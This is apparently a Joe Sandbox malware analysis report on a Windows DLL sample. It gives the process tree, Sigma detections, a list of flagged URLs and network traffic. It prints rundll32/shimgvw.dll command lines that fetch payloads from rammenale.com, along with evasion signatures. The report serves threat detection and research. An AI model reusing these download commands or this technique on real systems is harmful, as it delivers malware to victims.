Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QEydjQdRxs.dll

Overview

General Information

Sample name:QEydjQdRxs.dll
renamed because original name is a hash value
Original sample name:b62c9168fcde444dbc3be1593e80747929dcf1a49cc6305b49456d68d0c49e71.dll
Analysis ID:1500943
MD5:71481f31ac558750937ef27dad2d0025
SHA1:fa2010a283a723a0d2a68d6bc8b16389b36a3a04
SHA256:b62c9168fcde444dbc3be1593e80747929dcf1a49cc6305b49456d68d0c49e71
Tags:dllrammenale-com
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Execute DLL with spoofed extension
Sigma detected: rundll32 run dll from internet
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potentially Suspicious Rundll32 Activity
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 1532 cmdline: loaddll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4592 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7104 cmdline: rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 1992 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 2148 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 940 cmdline: rundll32.exe C:\Users\user\Desktop\QEydjQdRxs.dll,mydllmain MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 5260 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 1732 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5440 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5428 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Potentially Suspicious Rundll32 Activity
Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7104, ParentProcessName: rundll32.exe, ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, ProcessId: 1992, ProcessName: rundll32.exe

Data Obfuscation

barindex
Sigma detected: Execute DLL with spoofed extension
Source: Process startedAuthor: Joe Security: Data: Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7104, ParentProcessName: rundll32.exe, ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, ProcessId: 1992, ProcessName: rundll32.exe
Sigma detected: rundll32 run dll from internet
Source: Process startedAuthor: Joe Security: Data: Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7104, ParentProcessName: rundll32.exe, ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, ProcessId: 1992, ProcessName: rundll32.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://rammenale.com/for2/regit.tmp$uAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclogYAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtMAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpentAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtPRAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpftAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4kJAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp(Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpPR5Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtTAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp)Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtRAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt42Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt6634-1003(Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp%Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpryAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtOAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtZAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4?Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txteAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpsC:Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt)Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtenthAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4YAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4FAAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt3Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt0OAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt0Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt:Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclogAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpnAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtFAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpwAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpxe.muiEAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpzAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpsAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpC:Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpuAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt6634-1003Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt?Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp8a5Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4uAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp6634-1003Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtryAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtQwAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtrwAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpgAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmphAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4nAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt60Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtentindowsINetCookiesAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4rAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp08Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpPAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtfwAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtC:Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt&Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt%Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4~Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtftAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpAAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtkAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp;Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtiAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclogtxtAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtvAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtsAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4s5Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp0Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpmpAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4XAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtentdll8Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtxAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp7Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpc4uAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4ZfrhAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4$Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtdTAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpukAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtentdllAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp6Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: QEydjQdRxs.dllVirustotal: Detection: 8%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.9% probability
Machine Learning detection for sample
Source: QEydjQdRxs.dllJoe Sandbox ML: detected
Source: QEydjQdRxs.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: QEydjQdRxs.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6B921B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,0_2_6B921B85
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6B9338F4 FindFirstFileExW,0_2_6B9338F4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9E1B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,3_2_6F9E1B85
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9F38F4 FindFirstFileExW,3_2_6F9F38F4

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 131.153.206.231 443
Source: Joe Sandbox ViewASN Name: SS-ASHUS SS-ASHUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: rammenale.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:02 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:02 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:02 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:02 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:04 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:04 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: rundll32.exe, 00000005.00000002.3289519547.0000000008F70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3289414111.0000000007B5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337362841.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337408753.0000000008C19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289712371.0000000008C1B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: rundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comm
Source: rundll32.exe, 00000005.00000002.3289519547.0000000008F70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3289414111.0000000007B46000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337362841.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289577323.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286396113.0000000002AAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/
Source: rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com//9
Source: rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/6
Source: rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/T
Source: rundll32.exe, 00000006.00000002.3289715229.0000000008CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/d
Source: rundll32.exe, 0000000B.00000002.3288849622.0000000005132000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3288849622.000000000511A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog
Source: rundll32.exe, 0000000B.00000002.3286397413.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008D02000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt
Source: rundll32.exe, 00000005.00000002.3286428074.00000000031E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt%
Source: rundll32.exe, 00000006.00000002.3286763260.0000000003208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt&
Source: rundll32.exe, 00000006.00000002.3286763260.000000000319A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt)
Source: rundll32.exe, 00000006.00000002.3289715229.0000000008D34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt0
Source: rundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt0O
Source: rundll32.exe, 00000006.00000002.3286763260.000000000319A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3286397413.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt3
Source: rundll32.exe, 0000000B.00000002.3289283250.0000000008D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4
Source: rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4$
Source: rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt42
Source: rundll32.exe, 00000005.00000002.3289519547.0000000008F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4?
Source: rundll32.exe, 00000005.00000002.3289519547.0000000008F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4FA
Source: rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4Y
Source: rundll32.exe, 00000006.00000002.3289715229.0000000008CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4n
Source: rundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4r
Source: rundll32.exe, 00000005.00000002.3289519547.0000000008F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4u
Source: rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4~
Source: rundll32.exe, 00000005.00000002.3286428074.000000000317A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt60
Source: rundll32.exe, 00000005.00000002.3289519547.0000000008F42000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3289715229.0000000008CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt6634-1003
Source: rundll32.exe, 0000000B.00000002.3289283250.0000000008C74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt6634-1003(
Source: rundll32.exe, 00000005.00000002.3289519547.0000000008F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt:
Source: rundll32.exe, 00000006.00000002.3289715229.0000000008D34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt?
